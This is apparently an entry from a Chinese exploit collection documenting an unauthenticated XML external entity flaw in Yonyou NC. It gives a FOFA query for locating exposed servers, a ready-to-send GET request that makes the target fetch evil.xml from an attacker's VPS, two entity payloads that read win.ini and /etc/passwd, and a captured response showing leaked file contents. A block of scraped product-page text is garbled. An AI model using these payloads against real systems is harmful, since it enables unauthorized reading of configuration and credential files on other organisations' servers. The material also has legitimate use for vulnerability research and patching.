Y4-22用友-NC-XXE

漏洞描述:

用友 NC 多处接口存在XML实体注入漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状

网站图片:









连接

与企业应用的链接优化,并支持企业应用在终端上的自 验相关的端服务,并对提供的服务进行应用优化。 动升级

体验

UClient 提供全新客户端,消除浏览器依赖,完成用户 UClient 打造—个面向企业的端服务平台,提供改善体

社交

UClient 通过嵌入社交协同能力,建立企业用户之间的 连接,提供企业间数据共享和连接的服务,形成基于1 业服务云平台的企业社交网络。

版权所有© 2015 用友网络科技股份有限公司

网络测绘:

fofa语法:

app="用友-UFIDA-NC"

漏洞复现:

payload:

GET /uapws/service/nc.uap.oba.wordWebservice.IServiceEntry?xsd=http://VPS/evil.xml HTTP/1.1 Host: your-ip User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Connection: close Accept: text/plain, */*; q=0.01 Accept-Encoding: gzip

任意文件读取利用,需要VPS上建立对应操作系统的xml文件,然后开启http服务。xml文件如下

"1.0"?><!DOCTYPE test [<!ENTITY name SYSTEM "file:///c://windows/win.ini">]>
<user><username>&name;</username><password>I</password></user>

<?xml version="1.0"?><!DOCTYPE test [<!ENTITY name SYSTEM "file:///etc/passwd">]> <user><user><username>&name;</username><password>1</password></user>

效果图:

```
く ) 数据包扫描 热加載 构造清末 💥 Responses 179bytes / 238ms
                                                                                                                                                                                         美化 请输入定位响应
                                                                                                                          1 HTTP/1.1-200-0K
1 GET·/uapws/service/nc.uap.oba.wordWebservice.IServiceEntry?xsd-http://
                                                                                                                                  Server: Apache-Coyote/1.1
Content-Type: text/xml; charset-UTF-8
Date: Wed, 28-Feb: 2024-12:11:22-GMT
Connection: close
Content-Length: 179
      Host: ·1
User-Agent: ·Mozilla/5.0 · (Windows ·NT ·10.0; ·Win64; ·x64)
      Connection: close
Accept: text/plain, **/*; q=0.01
Accept-Encoding: gzip
                                                                                                                              [fonts]
[extensions]
[mci-extensions]
[files]
[Mail]
MAPI=1
                                                                                                                            11
```